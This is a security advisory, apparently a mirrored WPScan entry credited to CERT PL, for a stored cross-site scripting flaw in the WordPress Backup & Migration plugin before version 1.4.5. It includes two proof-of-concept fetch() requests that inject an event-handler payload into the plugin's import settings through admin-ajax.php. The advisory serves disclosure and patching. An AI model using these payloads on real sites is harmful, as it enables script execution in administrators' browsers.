Lucene search

Krzysztof Zając (CERT PL)WPEX-ID:7F935916-9A1A-40C7-B6D8-EFCC46EB8EAF

HistoryNov 06, 2023 - 12:00 a.m.

WordPress Backup & Migration < 1.4.5 - Subscriber+ Stored XSS

2023-11-0600:00:00

Krzysztof Zając (CERT PL)

wordpress

backup

migration

xss

subscriber

admin

csrf

security

vulnerability

5.6 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

14.0%

JSON

Description The plugin does not sanitise and escape some parameters, which could allow users with a role as low as Subscriber to perform Cross-Site Scripting attacks. This was partially fixed in version 1.4.4 but it still allowed XSS attacks from Admin users.

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "settings_data%5Bim_data_size_per_req%5D=1&settings_data%5Bim_db_file_per_req%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)+x&action=mgdp_plugin_save_import_settings",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

Then the admin needs to click http://127.0.0.1:8001/wp-admin/admin.php?page=wp-migration-duplicator#wt-mgdp-import -> advanced options
---
On version 1.4.4, a site admin must run the following command on the Backup & Migration page:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "settings_data%5Bim_data_size_per_req%5D=1&settings_data%5Bim_db_file_per_req%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)+x&action=mgdp_plugin_save_import_settings&_wpnonce=" + wp_migration_duplicator_import.nonces.main,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
})